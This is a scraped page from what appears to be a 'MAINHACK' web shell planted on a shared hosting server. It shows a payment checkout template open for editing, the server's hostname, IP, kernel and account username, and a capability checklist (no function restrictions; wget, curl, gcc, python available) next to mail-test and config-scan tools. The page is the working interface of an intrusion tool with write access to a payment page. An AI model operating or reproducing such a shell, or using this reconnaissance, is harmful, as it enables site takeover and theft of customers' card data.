[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: checkout.blade.php
<!DOCTYPE html> <html lang="{{app()->getLocale()}}"> <head> <title>{{__('myfatoorah.pageCheckout')}}</title> <link rel="stylesheet" href="{{asset('vendor/myfatoorah/css/style.css')}}"/> </head> <body dir="{{App::isLocale('ar') ? 'rtl' : 'ltr'}}"> <div class="mf-payment-methods-container" id="mf-noPaymentGateways"> <div class="mf-danger-text"> {{__('myfatoorah.noPaymentGateways')}} </div> </div> <div class="mf-payment-methods-container" id="mf-paymentGateways" > <div class="mf-grey-text"> {{__('myfatoorah.howWouldYouLikeToPay')}} </div> <!-- Google Pay & Apple Pay --> <div id="mf-sectionButtons"> <!-- Apple Pay --> @if(!empty($paymentMethods['ap'])) <div id="mf-sectionAP"> <div id="mf-ap-element" style="height: 40px;"></div> </div> @endif <!-- Google Pay --> @if(!empty($paymentMethods['gp'])) <div id="mf-sectionGP"> <div id="mf-gp-element"></div> </div> @endif </div> @if(!empty($paymentMethods['cards'] )) <div id="mf-sectionCard"> <div class="mf-divider card-divider" id="mf-payWith-cardDivider"> <span class="mf-divider-span" id="mf-payWith-divider"> <span id="mf-or-cardsDivider"> {{!empty($paymentMethods['ap'] ) || !empty($paymentMethods['gp'] ) ? __('myfatoorah.or') : ''}} </span> {{__('myfatoorah.payWith')}} </span> </div> <div id="mf-cards"> @include('myfatoorah.includes.sectionCards') </div> </div> @endif <!-- Payment Form --> @if(!empty($paymentMethods['form'])) <div class="mf-divider"> <span class="mf-divider-span"> <span id="mf-or-formDivider"> {{!empty($paymentMethods['cards'] ) || !empty($paymentMethods['ap'] ) || !empty($paymentMethods['gp'] ) ? __('myfatoorah.or') :''}} </span> {{__('myfatoorah.insertCardDetails')}} </span> </div> <div id="mf-form-element" style="width:99%; max-width:800px; padding: 0rem 0.2rem"></div> <button class="mf-btn mf-pay-now-btn" onclick="submit()" type="button" style=" border: none; border-radius: 8px; padding: 7px 3px; background-color: #0293cc"> <span class="mf-pay-now-span"> {{__('myfatoorah.payNow')}} </span> </button> @endif <script src="{{asset('vendor/myfatoorah/js/checkout.js')}}"></script> <script> function mfCallback(response) { window.location.href = "{{url('myfatoorah')}}?sid=" + response.sessionId; } </script> <!-- Google Pay Scripts --> @if(!empty($paymentMethods['gp'])) @include('myfatoorah.includes.sectionGooglePay') @endif <!-- Apple Pay Scripts --> @if(!empty($paymentMethods['ap'])) @include('myfatoorah.includes.sectionApplePay') @endif <!-- Payment Form Scripts --> @if(!empty($paymentMethods['form'])) @include('myfatoorah.includes.sectionForm') @endif </div> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285